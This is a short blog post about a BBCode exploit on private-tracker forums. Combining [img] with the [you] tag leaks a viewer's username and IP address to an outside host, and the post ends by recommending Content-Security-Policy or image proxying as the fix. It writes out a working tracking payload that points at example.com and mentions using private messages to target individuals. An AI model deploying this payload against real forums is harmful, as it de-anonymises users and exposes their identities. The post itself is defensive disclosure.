Workaround for IP Leakage via BBCode IMG tags

Workaround for IP Leakage via BBCode IMG tags

(TorrentFreak)[https://torrentfreak.com/private-tracker-member-data-leaked-via-bbcode-exploit-160313/] writes

“One of the BBCodes this site uses is [you]. If you place this in a forum or a private message it will insert the user’s logon name, that is viewing the page. If my username was ‘Randomusername’, and someone sent me a private message saying ‘Hello [you]!’, when I opened it, the BBcode would translate to ‘Hello Randomusername!'”

“When you add [you] on the end of an image, you get something like this http://example.com/photo.php?u=[USERNAME_OF_PERSON_VIEWING].jpg.”

TL;DR Use of [img] and [you] bbcode, the latter which gets converted into the person who is viewing it’s username.

[img]https://example.com/photo.php?u=[you].jpg[/img]
example.com then logs the username and IP.

One can use private messages to target specific people with this attack even if the [you] bbcode does not work.

Workaround: Use Content-Security-Policy to restrict img-src to approved image hosts or proxy images over your own servers.

Leave a Reply

Your email address will not be published. Required fields are marked *